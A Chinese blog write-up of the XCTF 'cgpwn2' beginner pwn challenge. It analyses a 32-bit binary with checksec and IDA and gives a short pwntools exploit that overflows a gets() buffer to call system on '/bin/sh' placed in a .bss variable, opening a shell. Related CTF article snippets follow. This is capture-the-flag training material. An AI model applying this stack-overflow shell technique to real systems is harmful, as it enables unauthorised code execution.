攻防世界pwn新手练习(cgpwn2)

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量476 收藏
点赞数
分类专栏: pwn 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681242/article/details/105125010
版权

题目链接

分析

我们来看这道题,首先checksec并运行一下
在这里插入图片描述
可以看到是32位程序,有两个输入点,保护只有 NX。

接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西
在这里插入图片描述
这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数

在这里插入图片描述

很遗憾的是只有system函数而没有我们需要的shellcode

看来只能我们自己往程序里面写了,可以发现的是第一个输入点哪儿有一个name,点击跟进

在这里插入图片描述

.bss 段的一个地址,我们知道NX开启的时候,.BSS也不一定就是不能执行的,我们可以先试试看,在第一个输入点输入 “/bin/sh”,第二个输入点溢出利用

在这里插入图片描述

结束了,它是可以成功利用的,over

构造payload的时候注意这是32位程序,而32位程序调用函数时栈的结构为:调用函数地址->函数的返回地址->参数n->参数n-1->···->参数1

exp

from pwn import *
context.log_level = 'info'

#r = remote('', )
r = process('./cgpwn2')
elf = ELF('./cgpwn2')

r.recvuntil("please tell me your name")
r.sendline("/bin/sh")

payload = 'a'*0x26 + 'a'*4 + p32(elf.sym['system']) + 'aaaa' + p32(0x0804A080) #最后这个是name地址,ida中复制即可
r.recvuntil("hello,you can leave some message here:")
r.sendline(payload)

r.interactive()

博客(buryia.top),欢迎师傅们来踩踩

布医_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 when_did_you_born
09-28 245
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
[攻防世界]cgpwn2
逆向萌新的博客
06-11 369
[攻防世界]cgpw2n
pwncgpwn2
qq_43430261的博客
10-22 731
https://blog.csdn.net/qq_43986365/article/details/94974853 https://blog.csdn.net/Closing_time/article/details/100428850 https://www.jianshu.com/p/3d19056282bf https://bbs.pediy.com/thread-254851.htm ...
攻防世界XCTF-Pwn入门11题解题报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 639
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
攻防世界pwn[cgpwn2]
SUOYE_GUANXING的博客
10-31 107
将 "/bin/sh" 写入name, 用gets函数进行栈溢出, system为返回值, name为system的参数。flag为:cyberpeace{b232df4322e677518de6a61097130634}下载文件,先check一下;这里需要0x26+0x4才能到我们的返回地址;发现system,但没有/bin/sh;跟进name发现它是一个静态地址;学的还是有点迷,但慢慢来嘛~32位的ida打开;进入hello函数;
攻防世界PWN-cgpwn2
Deeeelete的博客
11-14 338
题目:cgpwn2 拖进PE查看一下 32位程序 checksec查看 简单执行一下 开32位IDA f5反编译main函数 main函数中直接就是输出了,输入的内容好像藏在了hello方法里 双击进去查看 单独拿出源码 char *hello() { char *v0; // eax@1 signed int v1; // ebx@1 unsigned int v2; // ecx@3 char *v3; // eax@5 char s; // [sp+12
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
pwn07.ret2syscall例题
11-11
ret2syscall例题
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2043
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界PWN新手练习区——cgpwn2
smsyz2019的博客
09-23 300
攻防世界PWN新手练习区——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
攻防世界pwn-cgpwn2
a_silly_coder的博客
01-15 1434
下载文件后,首先检查保护: 随后将文件拖入ida,查看源码,在hello函数中,发现了如下代码 首先用安全的fgets输入了一个变量,接着用不安全的gets接收了一个变量,在此处可以确认是栈溢出,且溢出点就在此处。 开始寻找利用方式,发现了system函数 还缺一个"/bin/sh"字符串,找遍了代码,没有发现,但是由于此前可以有一个自己的输入,保存在name变量上,即可以自己手动输入"/bin/sh",自此,设计栈结构为: 开始编写脚本: from pwn imp...
攻防世界pwn新手题wp(通俗易懂)
njh18790816639的博客
03-10 1756
get_shell 这道题先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
攻防世界 Pwn cgpwn2
MrTreebook的博客
12-12 603
攻防世界 Pwn cgpwn21.题目下载地址2.checksec分析3.IDA分析3.1.看一下溢出大小4.exp4.1.运行结果 1.题目下载地址 点击下载 2.checksec分析 只开启了NX保护,应该不会有太多障碍 直接进IDA看一下 3.IDA分析 main函数中有一个hello函数,我们直接看hello函数 可以看到第二个gets函数没有限制输入大小,很明显是栈溢出 再看看有没有其他后门函数 看到有一个pwn函数中调用了system 而且第一个gets函数输入的name正好是处于bs
XCTF-pwn-cgpwn2 - Writeup
菜小狗.的博客
08-13 6728
虽然现在做的pwn题虽然很简单,但是已经慢慢的开始对解pwn题的过程有一些基础的思路了。 首先惯例流程走一遍: 丢到ida 瞅一眼 有看到system但是没有看到/bin/sh 查看hello的伪代码发现一些有趣的东西: 在这儿看到了gets()函数,这说明可能在这儿存在溢出漏洞。 同时点开上面的name,发现name固定的全局变量bss段 因而我们可以将/bin/sh构造进这个地址当中。...
攻防世界 - pwn - cgpwn2
qq726232111的博客
03-16 205
A、流程分析 1、将输入的用户名存储到全局变量 2、通过gets()获取留言信息 B、利用分析 1、gets( ebp-26h ) -> 26h(填充数据) + 4(ebp) + 4(返回地址) -> payload构造 2、可利用函数 在pwn函数有system函数,可通过该地址调用系统命令 3、用户名使用的全局变...
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值